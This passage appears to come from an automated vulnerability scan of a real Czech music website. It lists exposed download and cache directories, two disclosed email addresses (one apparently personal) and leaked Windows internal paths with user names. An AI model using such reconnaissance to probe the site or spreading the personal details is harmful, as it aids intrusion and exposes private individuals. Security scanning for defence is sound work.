1865. http://www.rockandpop.cz/underwood/download/
1866. http://www.rockandpop.cz/underwood/download/files/
1867. http://www.rockandpop.cz/cache/images/topNewsBig/
1868. http://www.rockandpop.cz/cache/images/
1869. http://www.rockandpop.cz/cache/
1870. http://www.rockandpop.cz/cache/images/topNewsSmall/
1871. http://www.rockandpop.cz/cache/images/newsSmall/
1872.  
1873. ||| E-mail Address Disclosure
1874.  
1875. Severity : Information
1876. Found E-mails:
1877.  
1878. online@rockandpop.cz
1879. lichnovsky-zdenek@centrum.cz
1880.  
1881. ||| [Possible] Internal Path Leakage (Windows)
1882.  
1883. Severity : Information
1884. Confirmation: Confirmed
1885. Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
1886. Identified Internal Path(s):
1887.  
1888. C:\Users\DAVIDX~1\AppData\Local\Temp\msohtmlclip1\01
1889. C:\temp\msohtml1\01
1890. C:\DOCUME~1\Ersian\LOCALS~1\Temp\msohtml1\01
1891.  
1892. By © SHERWOOD Media s.r.o.